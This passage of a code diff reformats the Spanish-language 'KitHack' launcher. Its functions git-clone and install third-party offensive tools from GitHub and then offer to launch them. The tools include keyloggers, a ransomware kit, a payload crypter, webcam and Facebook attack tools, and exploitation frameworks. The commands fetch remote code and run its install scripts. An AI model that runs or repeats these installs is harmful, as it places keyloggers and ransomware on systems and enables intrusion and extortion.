{2}/tools/Others/4nonimizer" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("4nonimizer help") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("4nonimizer help") + + def Easysploit(): - if not os.path.isdir('tools/Others/easysploit'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/KALILINUXTRICKSYT/easysploit.git && cd easysploit && bash installer.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/easysploit".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('easysploit') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('easysploit') + if not os.path.isdir("tools/Others/easysploit"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/KALILINUXTRICKSYT/easysploit.git && cd easysploit && bash installer.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/easysploit" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("easysploit") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("easysploit") + def NXcrypt(): - if not os.path.isdir('tools/Others/NXcrypt'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/Hadi999/NXcrypt.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/NXcrypt".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd NXcrypt && python NXcrypt.py --help') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd NXcrypt && python NXcrypt.py --help') + if not os.path.isdir("tools/Others/NXcrypt"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/Hadi999/NXcrypt.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/NXcrypt" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd NXcrypt && python NXcrypt.py --help" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd NXcrypt && python NXcrypt.py --help" + ) + def KnockMail(): - if not os.path.isdir('tools/Others/KnockMail'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/4w4k3/KnockMail.git && cd KnockMail && su && pip install -r requeriments.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/KnockMail".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd KnockMail && python knock.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd KnockMail && python knock.py') + if not os.path.isdir("tools/Others/KnockMail"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/4w4k3/KnockMail.git && cd KnockMail && su && pip install -r requeriments.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/KnockMail" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd KnockMail && python knock.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd KnockMail && python knock.py") + def RkHunter(): - if not os.path.isdir('tools/Others/rkhunter'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/installation/rkhunter.git && cd rkhunter && chmod +x install.sh && bash install.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/rkhunter".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('rkhunter') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('rkhunter') + if not os.path.isdir("tools/Others/rkhunter"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/installation/rkhunter.git && cd rkhunter && chmod +x install.sh && bash install.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/rkhunter" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("rkhunter") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("rkhunter") + def HeraKeylogger(): - if not os.path.isdir('tools/Others/HeraKeylogger'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install python3-pip -y && cd tools && cd Others && git clone https://github.com/UndeadSec/HeraKeylogger.git && cd HeraKeylogger && pip3 install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/HeraKeylogger".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd HeraKeylogger && python3 hera.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd HeraKeylogger && python3 hera.py') + if not os.path.isdir("tools/Others/HeraKeylogger"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt-get install python3-pip -y && cd tools && cd Others && git clone https://github.com/UndeadSec/HeraKeylogger.git && cd HeraKeylogger && pip3 install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/HeraKeylogger" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd HeraKeylogger && python3 hera.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd HeraKeylogger && python3 hera.py") + def ZLogger(): - if not os.path.isdir('tools/Others/ZLogger'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/z00z/ZLogger.git && cd ZLogger && bash install.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/ZLogger".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd ZLogger && python zlogger.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd ZLogger && python zlogger.py') + if not os.path.isdir("tools/Others/ZLogger"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/z00z/ZLogger.git && cd ZLogger && bash install.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/ZLogger" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd ZLogger && python zlogger.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd ZLogger && python zlogger.py") + def Xerosploit(): - if not os.path.isdir('tools/Others/xerosploit'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/LionSec/xerosploit.git && cd xerosploit && python install.py') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/xerosploit".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('xerosploit') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('xerosploit') - + if not os.path.isdir("tools/Others/xerosploit"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/LionSec/xerosploit.git && cd xerosploit && python install.py" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/xerosploit" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("xerosploit") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("xerosploit") + + def Slacksec(): - if not os.path.isdir('tools/Others/Slacksec'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/franc205/Slacksec.git && cp Slacksec/slacksec.py /usr/bin/slacksec && chmod +x /usr/bin/slacksec') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/Slacksec".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('slacksec') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('slacksec') + if not os.path.isdir("tools/Others/Slacksec"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/franc205/Slacksec.git && cp Slacksec/slacksec.py /usr/bin/slacksec && chmod +x /usr/bin/slacksec" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/Slacksec" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("slacksec") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("slacksec") + def Katana(): - if not os.path.isdir('tools/Others/KatanaFramework'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/PowerScript/KatanaFramework && cd KatanaFramework && sh dependencies && python install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/KatanaFramework".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd KatanaFramework && ktf.console') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd KatanaFramework && ktf.console') - -def Z0172CKTools(): - if not os.path.isdir('tools/Others/Z0172CK-Tools'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt install python3 python3-pip && cd tools && cd Others && git clone https://github.com/Erik172/Z0172CK-Tools.git && cd Z0172CK-Tools && bash install.sh && pip3 install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/Z0172CK-Tools".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd Z0172CK-Tools && python3 index.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd Z0172CK-Tools && python3 index.py') + if not os.path.isdir("tools/Others/KatanaFramework"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/PowerScript/KatanaFramework && cd KatanaFramework && sh dependencies && python install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/KatanaFramework" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd KatanaFramework && ktf.console") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd KatanaFramework && ktf.console") + + +def Z0172CKTools(): + if not os.path.isdir("tools/Others/Z0172CK-Tools"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt install python3 python3-pip && cd tools && cd Others && git clone https://github.com/Erik172/Z0172CK-Tools.git && cd Z0172CK-Tools && bash install.sh && pip3 install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/Z0172CK-Tools" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd Z0172CK-Tools && python3 index.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd Z0172CK-Tools && python3 index.py" + ) + def CamHack(): - if not os.path.isdir('tools/Others/Cam-Hack'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/Hack-The-World-With-Tech/Cam-Hack.git && cd Cam-Hack && chmod +x *') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/Cam-Hack".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd Cam-Hack && bash camhack.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd Cam-Hack && bash camhack.sh') + if not os.path.isdir("tools/Others/Cam-Hack"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/Hack-The-World-With-Tech/Cam-Hack.git && cd Cam-Hack && chmod +x *" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/Cam-Hack" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd Cam-Hack && bash camhack.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd Cam-Hack && bash camhack.sh") + def Onex(): - if not os.path.isdir('tools/Others/onex'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/rajkumardusad/onex.git && cd onex && bash install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/onex".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd onex && bash onex') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd onex && bash onex') + if not os.path.isdir("tools/Others/onex"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/rajkumardusad/onex.git && cd onex && bash install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/onex". + format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Others && cd onex && bash onex") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Others && cd onex && bash onex") + def Ransom0(): - if not os.path.isdir('tools/Others/Ransom0'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/HugoLB0/Ransom0.git && cd Ransom0 && pip2 install requirementx.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/Ransom0".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd Ransom0 && python ransom0.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd Ransom0 && python ransom0.py') + if not os.path.isdir("tools/Others/Ransom0"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/HugoLB0/Ransom0.git && cd Ransom0 && pip2 install requirementx.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/Ransom0" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd Ransom0 && python ransom0.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd Ransom0 && python ransom0.py") + def Morpheus(): - if not os.path.isdir('tools/Others/morpheus'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/r00t-3xp10it/morpheus.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/morpheus".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd morpheus && bash morpheus.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd morpheus && bash morpheus.sh') + if not os.path.isdir("tools/Others/morpheus"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/r00t-3xp10it/morpheus.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/morpheus" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd morpheus && bash morpheus.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd morpheus && bash morpheus.sh") + def FBTOOL(): - if not os.path.isdir('tools/Others/FBTOOL'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/mkdirlove/FBTOOL.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/FBTOOL".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd FBTOOL && python2 fbtool.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd FBTOOL && python2 fbtool.py') + if not os.path.isdir("tools/Others/FBTOOL"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Others && git clone https://github.com/mkdirlove/FBTOOL.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/FBTOOL" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd FBTOOL && python2 fbtool.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Others && cd FBTOOL && python2 fbtool.py") -def Venom(): - if not os.path.isdir('tools/Others/venom'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Others && git clone https://github.com/r00t-3xp10it/venom.git && cd venom && chmod +x * && bash setup.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Others/venom".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd venom && bash venom.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Others && cd venom && bash venom.sh') +def Venom(): + if not os.path.isdir("tools/Others/venom"): + 